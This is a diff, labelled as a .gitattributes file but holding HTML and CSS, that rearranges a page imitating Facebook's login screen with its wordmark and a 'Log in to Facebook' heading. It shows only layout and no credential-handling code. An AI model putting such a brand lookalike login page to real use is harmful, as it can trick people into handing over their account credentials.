--- a/.gitattributes
+++ b/.gitattributes
@@ -20,8 +20,7 @@ padding-bottom: 10px;
 border-radius: 10px;
 
 }
- 
-		
+	
 </style>
 
 
@@ -29,14 +28,20 @@ border-radius: 10px;
 
 
 <body>
+	
 	<table><form>
+		<div class="box">
 
-<div style="width: 100%; height: 100%; position: relative; background: linear-gradient(217deg, rgba(99.88, 84.48, 88.17, 0) 0%, rgba(108.87, 93.33, 97.06, 0) 7%, rgba(112.33, 96.74, 100.48, 0) 9%, rgba(137.23, 121.25, 125.09, 0) 28%, rgba(157.98, 141.68, 145.60, 0) 44%, rgba(196.72, 179.82, 183.88, 0) 73%, rgba(173.58, 157.04, 161.01, 0) 87%, rgba(232.69, 215.24, 219.42, 0) 100%)">
-    <div style="width: 360px; height: 64px; left: 530px; top: 260px; position: absolute; color: #3531FA; font-size: 64px; font-family: sans-serif; font-weight: 700; font-style: inherit; word-wrap: break-word"><b>facebook</b></div>
-    <div style="width: 527px; height: 384px; left: 410px; top: 358px; position: absolute;  background: rgba(253.94, 247.59, 247.59, 0.22); border-radius: 15px"></div>
->
+		<div style="background-color: rgb(202, 139, 139); box-shadow: 5px; border: 2px solid black;
+		width: 380px;height: 280px;
+		 border-radius: 5px; left: 470px; top: 340px; position: absolute; color:#3531FA;"></div>
 		
-	  
+			
+<div style="width: 100%; height: 100%; position: relative; background: linear-gradient(217deg, rgba(99.88, 84.48, 88.17, 0) 0%, rgba(108.87, 93.33, 97.06, 0) 7%, rgba(112.33, 96.74, 100.48, 0) 9%, rgba(137.23, 121.25, 125.09, 0) 28%, rgba(157.98, 141.68, 145.60, 0) 44%, rgba(196.72, 179.82, 183.88, 0) 73%, rgba(173.58, 157.04, 161.01, 0) 87%, rgba(232.69, 215.24, 219.42, 0) 100%)">
+    <div style="width: 360px; height: 64px; left: 515px; top: 260px; position: absolute; color: #3531FA; font-size: 64px; font-family: sans-serif; font-weight: 700; font-style: inherit; word-wrap: break-word"><b>facebook</b></div>
+    <div style="width: 527px; height: 384px; left: 410px; top: 358px; position: absolute;  background: rgba(253.94, 247.59, 247.59, 0.22); border-radius: 15px"></div>
+		</div>
+ 
 
     <div style="left: 574px; top: 350px; position: absolute; color: black; font-size: 20px; font-family: Inter; font-weight: 300; word-wrap: break-word">Log in to Facebook</div>
 
